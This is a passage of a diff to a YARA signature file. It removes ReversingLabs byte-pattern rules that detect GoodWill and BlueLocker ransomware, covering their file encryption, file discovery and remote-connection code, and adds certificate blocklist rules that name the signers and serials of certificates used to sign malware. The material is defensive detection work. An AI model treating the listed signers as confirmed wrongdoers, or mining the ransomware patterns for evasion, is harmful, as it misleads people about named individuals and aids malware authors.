-            ?? 8D 85 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 83 7D
-            ?? ?? 72 ?? FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? 83 7D ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45
-            ?? ?? ?? ?? ?? C6 45 ?? ?? 72 ?? FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B 4D ?? 64 89 0D
-            ?? ?? ?? ?? 59 5F 5E 5B 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C3
-        }
-		$enum_drives_p1 = {
-            6A ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ??
-            ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 8D 8D ?? ??
-            ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ??
-            ?? E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ??
-            ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 68 ?? ??
-            ?? ?? 8D 8D ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ??
-            C6 85 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C7 85 ??
-            ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? E8 ?? ?? ??
-            ?? 6A ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ??
-            ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 8D 8D ??
-            ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85
-        }
-		$enum_drives_p2 = {
-            E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ??
-            C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ??
-            ?? 8D 8D ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6
-            85 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C7 85 ?? ??
-            ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? E8 ?? ?? ?? ??
-            6A ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ??
-            ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7
-            85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ??
-            ?? E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 85
-            ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 8D
-            4D ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 6A ?? 68
-            ?? ?? ?? ?? 8D 4D ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C6 45 ?? ?? E8
-        }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and ( ( all of ( $enum_directories_p* ) ) and ( all of ( $enum_drives_p* ) ) and ( all of ( $encrypt_files_p* ) ) )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Yuanyuan Zhang" and pe.signatures [ i ] . serial == "71:9c:17:a8:23:83:9d:ca:81:3e:e8:58:88:b3:b3:9a" and 1479686400 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Bytecode_MSIL_Ransomware_Goodwill : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_6Dc86Ebf5863568E2237B2D89582D705 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects GoodWill ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "66358802-450b-5276-8088-b3550519b1e8"
-		date = "2022-06-28"
-		modified = "2022-06-28"
+		id = "24741dc7-6252-5964-a69f-bef4b2dfe1a7"
+		date = "2023-11-08"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/ransomware/ByteCode.MSIL.Ransomware.GoodWill.yara#L1-L89"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "94e2950f415ba737fe5ca9d32a3d850dd5744e547c4ca094ad28545e19033cb2"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L16026-L16042"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "f24cdf890bd0b51a83ca333c37bc22068ab1f7e7ef36b36d94a133773097bd37"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "GoodWill"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$encrypt_file = {
-            02 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 7E ?? ?? ?? ?? 6F ?? ?? ?? ?? 0A 28 ?? ?? ?? ?? 06 6F
-            ?? ?? ?? ?? 0A 06 28 ?? ?? ?? ?? 0B 02 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0C 02 72 ?? ?? ??
-            ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 08 07 28 ?? ?? ?? ?? 02 28 ?? ?? ?? ?? DE ?? 26 72 ??
-            ?? ?? ?? 28 ?? ?? ?? ?? DE ?? 2A
-        }
-		$aes_encrypt = {
-            14 0A 03 0B 73 ?? ?? ?? ?? 0C 73 ?? ?? ?? ?? 0D 09 20 ?? ?? ?? ?? 6F ?? ?? ?? ?? 09 20
-            ?? ?? ?? ?? 6F ?? ?? ?? ?? 03 07 20 ?? ?? ?? ?? 73 ?? ?? ?? ?? 13 ?? 09 11 ?? 09 6F ??
-            ?? ?? ?? 1E 5B 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 09 11 ?? 09 6F ?? ?? ?? ?? 1E 5B 6F ?? ??
-            ?? ?? 6F ?? ?? ?? ?? 09 17 6F ?? ?? ?? ?? 08 09 6F ?? ?? ?? ?? 17 73 ?? ?? ?? ?? 13 ??
-            11 ?? 02 16 02 8E 69 6F ?? ?? ?? ?? 11 ?? 6F ?? ?? ?? ?? DE ?? 11 ?? 2C ?? 11 ?? 6F ??
-            ?? ?? ?? DC 08 6F ?? ?? ?? ?? 0A DE ?? 09 2C ?? 09 6F ?? ?? ?? ?? DC 08 2C ?? 08 6F ??
-            ?? ?? ?? DC 06 2A
-        }
-		$find_files_p1 = {
-            28 ?? ?? ?? ?? 0A 1F ?? 28 ?? ?? ?? ?? 0B 18 8D ?? ?? ?? ?? 25 16 72 ?? ?? ?? ?? A2 25
-            17 72 ?? ?? ?? ?? A2 0C 06 0D 16 13 ?? 38 ?? ?? ?? ?? 09 11 ?? 9A 13 ?? 11 ?? 6F ?? ??
-            ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 2C ?? DD ?? ?? ?? ?? 11 ?? 6F ?? ?? ?? ?? 13 ?? 11
-            ?? 28 ?? ?? ?? ?? 08 13 ?? 16 13 ?? 38 ?? ?? ?? ?? 11 ?? 11 ?? 9A 13 ?? 11 ?? 28 ?? ??
-            ?? ?? 6F ?? ?? ?? ?? 13 ?? 2B ?? 11 ?? 6F ?? ?? ?? ?? 13 ?? 11 ?? 11 ?? 17 28 ?? ?? ??
-            ?? 6F ?? ?? ?? ?? 13 ?? 2B ?? 73 ?? ?? ?? ?? 13 ?? 11 ?? 11 ?? 6F ?? ?? ?? ?? 7D ?? ??
-            ?? ?? 11 ?? FE 06 ?? ?? ?? ?? 73 ?? ?? ?? ?? 73 ?? ?? ?? ?? 25 19 6F ?? ?? ?? ?? 6F ??
-            ?? ?? ?? DE ?? 26 DE ?? 11 ?? 6F ?? ?? ?? ?? 2D ?? DE ?? 11 ?? 2C ?? 11 ?? 6F ?? ?? ??
-            ?? DC DE ?? 26 DE ?? 26 DE ?? 11 ?? 6F ?? ?? ?? ?? 2D ?? DE ?? 11 ?? 2C ?? 11 ?? 6F ??
-            ?? ?? ?? DC 11 ?? 11 ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? 2B ?? 73 ?? ?? ?? ?? 13 ??
-            11 ?? 11 ?? 6F ?? ?? ?? ?? 7D ?? ?? ?? ?? 11 ?? FE 06 ?? ?? ?? ?? 73 ?? ?? ?? ?? 73 ??
-            ?? ?? ?? 25 19 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? DE ?? 26 DE ?? 11 ?? 6F ?? ?? ?? ?? 2D ??
-            DE ?? 11 ?? 2C ?? 11 ?? 6F ?? ?? ?? ?? DC DE ?? 26 DE ?? 11 ?? 17 58 13 ?? 11 ?? 11 ??
-            8E 69 3F ?? ?? ?? ?? DE ?? 26 DE ?? 11 ?? 17 58 13 ?? 11 ?? 09 8E 69 3F ?? ?? ?? ?? 08
-        }
-		$find_files_p2 = {
-            13 ?? 16 13 ?? 38 ?? ?? ?? ?? 11 ?? 11 ?? 9A 13 ?? 07 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 13
-            ?? 2B ?? 11 ?? 6F ?? ?? ?? ?? 13 ?? 11 ?? 11 ?? 17 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ??
-            2B ?? 73 ?? ?? ?? ?? 13 ?? 11 ?? 11 ?? 6F ?? ?? ?? ?? 7D ?? ?? ?? ?? 11 ?? FE 06 ?? ??
-            ?? ?? 73 ?? ?? ?? ?? 73 ?? ?? ?? ?? 25 19 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? DE ?? 26 DE ??
-            26 DE ?? 11 ?? 6F ?? ?? ?? ?? 2D ?? DE ?? 11 ?? 2C ?? 11 ?? 6F ?? ?? ?? ?? DC DE ?? 26
-            DE ?? 11 ?? 6F ?? ?? ?? ?? 2D ?? DE ?? 11 ?? 2C ?? 11 ?? 6F ?? ?? ?? ?? DC 07 11 ?? 28
-            ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? 2B ?? 73 ?? ?? ?? ?? 13 ?? 11 ?? 11 ?? 6F ?? ?? ?? ??
-            7D ?? ?? ?? ?? 11 ?? FE 06 ?? ?? ?? ?? 73 ?? ?? ?? ?? 73 ?? ?? ?? ?? 25 19 6F ?? ?? ??
-            ?? 6F ?? ?? ?? ?? DE ?? 26 DE ?? 11 ?? 6F ?? ?? ?? ?? 2D ?? DE ?? 11 ?? 2C ?? 11 ?? 6F
-            ?? ?? ?? ?? DC DE ?? 26 DE ?? 11 ?? 17 58 13 ?? 11 ?? 11 ?? 8E 69 3F ?? ?? ?? ?? 2A
-        }
-		$remote_connection = {
-            73 ?? ?? ?? ?? 0A 00 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 2C ?? 7E ?? ?? ?? ?? 17 28 ?? ?? ??
-            ?? 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 1C 6F ?? ?? ?? ?? 2B ?? 7E ?? ?? ?? ?? 28 ?? ?? ?? ??
-            1C 6F ?? ?? ?? ?? 06 7E ?? ?? ?? ?? 7E ?? ?? ?? ?? 6F ?? ?? ?? ?? 20 ?? ?? ?? ?? 28 ??
-            ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 26 17 0B DE ?? 26 72 ?? ?? ?? ??
-            28 ?? ?? ?? ?? 20 ?? ?? ?? ?? 28 ?? ?? ?? ?? DE ?? 07 2A
-        }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and ( all of ( $find_files_p* ) ) and ( $encrypt_file ) and ( $aes_encrypt ) and ( $remote_connection )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Dening Hu" and pe.signatures [ i ] . serial == "6d:c8:6e:bf:58:63:56:8e:22:37:b2:d8:95:82:d7:05" and 1471305600 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_Bluelocker : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_214Df59Fe53874Cc011Dd45727035F51 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects BlueLocker ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "145ff05e-c90d-598a-a3d5-220bd6df718a"
-		date = "2022-08-04"
-		modified = "2022-08-04"
+		id = "9265bb94-b183-523f-91bf-9bc76ab63d6b"
+		date = "2023-11-08"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/ransomware/Win32.Ransomware.BlueLocker.yara#L1-L130"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "fbe5f246f4554e63b5da6a0aca169e8221a84fce18fd437ae7ad9b068e9ca576"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L16044-L16060"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "96269f41f82621aee029f343acfce70c781bf7713588dfe78fac35a3d1d3f7cd"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "BlueLocker"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$encrypt_files_p1 = {
-            55 8B EC 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 8B 45 ?? 53 56 8B 75 ?? 57
-            8B 7D ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 56 89 55 ?? 89 75 ??
-            89 45 ?? 89 7D ?? FF 15 ?? ?? ?? ?? 8B D8 C7 45 ?? ?? ?? ?? ?? 8D 45 ?? 50 53 FF 15
-            ?? ?? ?? ?? 8B 55 ?? 33 C9 0B C8 89 55 ?? 89 4D ?? 83 FB ?? 75 ?? 0B C3 5F 5E 5B 8B
-            4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C3 6A ?? 56 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8B
-            F0 FF 15 ?? ?? ?? ?? 33 C9 03 F0 83 C6 ?? 0F 92 C1 F7 D9 0B CE 51 E8 ?? ?? ?? ?? 8B
-            F0 83 C4 ?? 89 75 ?? 85 F6 0F 84 ?? ?? ?? ?? FF 75 ?? FF 15 ?? ?? ?? ?? 50 FF 75 ??
-            56 E8 ?? ?? ?? ?? 83 C4 ?? D1 E8 50 56 E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 56 E8
-            ?? ?? ?? ?? 83 C4 ?? D1 E8 50 56 E8 ?? ?? ?? ?? 8B 4D ?? 83 C4 ?? 85 C9 0F 8C ?? ??
-            ?? ?? 8B 45 ?? 0F 8F ?? ?? ?? ?? 3D ?? ?? ?? ?? 0F 82 ?? ?? ?? ?? 85 C9 0F 8F ?? ??
-            ?? ?? 7C ?? 3D ?? ?? ?? ?? 0F 83 ?? ?? ?? ?? 6A ?? 53 FF 15 ?? ?? ?? ?? 8B 55 ?? 8D
-            4D ?? D1 E8 89 45 ?? E8 ?? ?? ?? ?? 0F B6 4F ?? 0F 57 C0 0F B6 47 ?? C1 E1 ?? 0B C8
-        }
-		$encrypt_files_p2 = {
-            66 0F 13 45 ?? 0F B6 47 ?? C1 E1 ?? 0B C8 C7 45 ?? ?? ?? ?? ?? 0F B6 07 C1 E1 ?? 0B
-            C8 C7 45 ?? ?? ?? ?? ?? 0F B6 47 ?? 89 4D ?? 0F B6 4F ?? C1 E1 ?? 0B C8 0F B6 47 ??
-            6A ?? 6A ?? FF 75 ?? C1 E1 ?? FF 75 ?? 0B C8 0F B6 47 ?? 8B 3D ?? ?? ?? ?? C1 E1 ??
-            0B C8 53 89 4D ?? FF D7 33 F6 8D 45 ?? 56 50 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 53 FF 15
-            ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 0F 1F 40 ?? FF 75 ?? BA ?? ?? ?? ?? 8D 4D ?? E8
-            ?? ?? ?? ?? 8B 4D ?? 83 C4 ?? 33 C0 F7 D9 13 C0 6A ?? 6A ?? F7 D8 50 51 53 FF D7 6A
-            ?? 8D 45 ?? 50 FF 75 ?? 68 ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ??
-            8B 45 ?? 03 F0 3B 75 ?? 0F 87 ?? ?? ?? ?? 3D ?? ?? ?? ?? 0F 82 ?? ?? ?? ?? 6A ?? 8D
-            45 ?? 50 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ?? 85 C0 75 ?? E9 ?? ?? ??
-            ?? 85 C9 7F ?? 7C ?? 3D ?? ?? ?? ?? 73 ?? 8B 75 ?? 8B CB 57 8B D6 E8 ?? ?? ?? ?? 8B
-            3D ?? ?? ?? ?? 83 C4 ?? E9 ?? ?? ?? ?? 8B 75 ?? 8B CB 57 8B D6 E8 ?? ?? ?? ?? 8B 3D
-            ?? ?? ?? ?? 83 C4 ?? E9 ?? ?? ?? ?? 8B 55 ?? 8D 4D ?? E8 ?? ?? ?? ?? 0F B6 4F ?? 0F
-        }
-		$encrypt_files_p3 = {
-            57 C0 0F B6 47 ?? C1 E1 ?? 0B C8 66 0F 13 45 ?? 0F B6 47 ?? C1 E1 ?? 0B C8 C7 45 ??
-            ?? ?? ?? ?? 0F B6 07 C1 E1 ?? 0B C8 C7 45 ?? ?? ?? ?? ?? 0F B6 47 ?? 89 4D ?? 0F B6
-            4F ?? C1 E1 ?? 0B C8 0F B6 47 ?? 6A ?? 6A ?? FF 75 ?? C1 E1 ?? FF 75 ?? 0B C8 0F B6
-            47 ?? 8B 3D ?? ?? ?? ?? C1 E1 ?? 0B C8 53 89 4D ?? FF D7 8B 35 ?? ?? ?? ?? 8D 45 ??
-            6A ?? 50 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 53 FF D6 85 C0 74 ?? FF 75 ?? BA ?? ?? ?? ??
-            8D 4D ?? E8 ?? ?? ?? ?? 8B 4D ?? 83 C4 ?? 33 C0 F7 D9 13 C0 6A ?? 6A ?? F7 D8 50 51
-            53 FF D7 6A ?? 8D 45 ?? 50 FF 75 ?? 68 ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ?? 85 C0 74 ??
-            81 7D ?? ?? ?? ?? ?? 72 ?? 6A ?? 8D 45 ?? 50 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 53 FF D6
-            85 C0 75 ?? 8B 75 ?? 6A ?? 0F 57 C0 6A ?? 66 0F 13 45 ?? FF 75 ?? FF 75 ?? 53 FF D7
-            6A ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B D0 C7 45 ?? ?? ?? ?? ?? 83 C4 ?? 89 55 ?? C7
-            45 ?? ?? ?? ?? ?? 85 D2 74 ?? 8B FA B9 ?? ?? ?? ?? F3 A5 8B 4D ?? 68 ?? ?? ?? ?? 8B
-            01 8B 49 ?? 89 82 ?? ?? ?? ?? 8D 45 ?? 50 52 6A ?? 6A ?? 6A ?? FF 75 ?? 89 8A ?? ??
-            ?? ?? FF 15 ?? ?? ?? ?? 8B 75 ?? 85 C0 74 ?? 6A ?? 8D 45 ?? 50 FF 75 ?? 56 53 FF 15
-            ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 83 C4 ?? 33 F6 EB ?? 83 CE ?? 85 DB 74 ?? 53 FF 15 ??
-            ?? ?? ?? 8B 7D ?? 57 FF 75 ?? FF 15 ?? ?? ?? ?? EB ?? 8B 7D ?? 57 E8 ?? ?? ?? ?? 8B
-            4D ?? 83 C4 ?? 8B C6 33 CD 5F 5E 5B E8 ?? ?? ?? ?? 8B E5 5D C3
-        }
-		$find_files_p1 = {
-            FF 74 B4 ?? 8D 84 24 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 46 83
-            FE ?? 7C ?? FF 74 24 ?? FF D7 68 ?? ?? ?? ?? 8B F0 FF D7 03 F0 8D 84 24 ?? ?? ?? ??
-            6A ?? 50 FF D7 8D 0C 06 33 C0 83 C1 ?? 0F 92 C0 F7 D8 0B C1 50 E8 ?? ?? ?? ?? 8B F0
-            83 C4 ?? 85 F6 0F 84 ?? ?? ?? ?? FF 74 24 ?? FF D7 48 50 FF 74 24 ?? 56 E8 ?? ?? ??
-            ?? 83 C4 ?? D1 E8 50 56 E8 ?? ?? ?? ?? 83 C4 ?? 8D 84 24 ?? ?? ?? ?? 50 56 E8 ?? ??
-            ?? ?? 83 C4 ?? D1 E8 50 56 E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 56 E8 ?? ?? ?? ??
-            83 C4 ?? D1 E8 50 56 E8 ?? ?? ?? ?? 8B 7C 24 ?? 83 C4 ?? 83 C7 ?? 57 FF 15 ?? ?? ??
-            ?? 6A ?? 6A ?? E8 ?? ?? ?? ?? 8B C8 83 C4 ?? 85 C9 74 ?? 8B 54 24 ?? C7 01 ?? ?? ??
-            ?? C7 41 ?? ?? ?? ?? ?? 83 7A ?? ?? 75 ?? 89 4A ?? 89 4A ?? 57 89 31 FF 15 ?? ?? ??
-            ?? E9 ?? ?? ?? ?? 8B 42 ?? 89 48 ?? 8B 42 ?? 8B 40 ?? 89 42 ?? 89 30 57 FF 15 ?? ??
-            ?? ?? E9 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 33 F6 C7 44 24 ?? ?? ?? ?? ?? C7 44 24
-            ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ??
-            ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24
-            ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ??
-            ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24
-            ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ??
-            ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? FF 74 B4 ?? 8D 84 24
-        }
-		$find_files_p2 = {
-            50 FF D3 85 C0 0F 85 ?? ?? ?? ?? 46 83 FE ?? 7C ?? 6A ?? FF 74 24 ?? FF D7 8B F0 8D
-            84 24 ?? ?? ?? ?? 50 FF D7 03 F0 33 C0 83 C6 ?? 0F 92 C0 F7 D8 0B C6 50 E8 ?? ?? ??
-            ?? 8B F0 83 C4 ?? 85 F6 0F 84 ?? ?? ?? ?? FF 74 24 ?? FF D7 48 50 FF 74 24 ?? 56 E8
-            ?? ?? ?? ?? 83 C4 ?? D1 E8 50 56 E8 ?? ?? ?? ?? 83 C4 ?? 8D 84 24 ?? ?? ?? ?? 50 56
-            E8 ?? ?? ?? ?? 83 C4 ?? D1 E8 50 56 E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 68 ?? ?? ?? ?? E8
-            ?? ?? ?? ?? 8B F8 83 C4 ?? 85 FF 75 ?? 56 E8 ?? ?? ?? ?? EB ?? 6A ?? 6A ?? E8 ?? ??
-            ?? ?? 8B D8 83 C4 ?? 85 DB 75 ?? 56 E8 ?? ?? ?? ?? 83 C4 ?? 57 EB ?? 57 68 ?? ?? ??
-            ?? FF 74 24 ?? FF 15 ?? ?? ?? ?? 85 C0 74 ?? 53 6A ?? FF 74 24 ?? FF 15 ?? ?? ?? ??
-            85 C0 74 ?? 8B 54 24 ?? 53 57 56 E8 ?? ?? ?? ?? 83 C4 ?? 56 E8 ?? ?? ?? ?? 83 C4 ??
-            57 E8 ?? ?? ?? ?? 83 C4 ?? 53 E8 ?? ?? ?? ?? 8B 1D ?? ?? ?? ?? 83 C4 ?? 8B 35 ?? ??
-            ?? ?? 8D 84 24 ?? ?? ?? ?? 50 FF 74 24 ?? FF 15
-        }
-		$create_crypt_context = {
-            55 8B EC 83 EC ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? FF 15 ??
-            ?? ?? ?? 6A ?? 50 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 83 C8 ?? 8B 4D ?? 33 CD E8 ?? ?? ??
-            ?? 8B E5 5D C2 ?? ?? 56 8B 35 ?? ?? ?? ?? 8D 45 ?? 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ??
-            ?? 6A ?? 50 FF D6 85 C0 75 ?? 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 50 8D 45 ?? 50 FF
-            D6 85 C0 75 ?? 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 50 8D 45 ?? 50 FF D6 85 C0 75 ??
-            68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 50 8D 45 ?? 50 FF D6 85 C0 0F 84 ?? ?? ?? ?? 6A
-            ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B F0 83 C4 ?? 85 F6 74 ?? 68 ?? ?? ?? ?? 56 6A ??
-            FF 15 ?? ?? ?? ?? 8D 45 ?? 89 35 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ??
-            68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 75 ?? FF 35 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8D
-            04 45 ?? ?? ?? ?? 50 FF 35 ?? ?? ?? ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? FF 75 ?? FF 15 ??
-            ?? ?? ?? 85 C0 75 ?? 50 50 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 FF 15 ??
-            ?? ?? ?? 8B 45 ?? 5E 85 C0 74 ?? 6A ?? 50 FF 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 4D ??
-            33 C0 33 CD E8 ?? ?? ?? ?? 8B E5 5D C2
-        }
+	condition:
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Xin Zhou" and pe.signatures [ i ] . serial == "21:4d:f5:9f:e5:38:74:cc:01:1d:d4:57:27:03:5f:51" and 1468800000 <= pe.signatures [ i ] . not_after )
+}
+
+rule REVERSINGLABS_Cert_Blocklist_37Ca4F66Fdcc8732992723199859886C : INFO FILE
+{
+	meta:
+		description = "Certificate used for digitally signing malware."
+		author = "ReversingLabs"
+		id = "9dd87769-73d0-5299-b6ed-936703abc78e"
+		date = "2023-11-08"
+		modified = "2023-11-08"
+		reference = "ReversingLabs"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L16062-L16078"
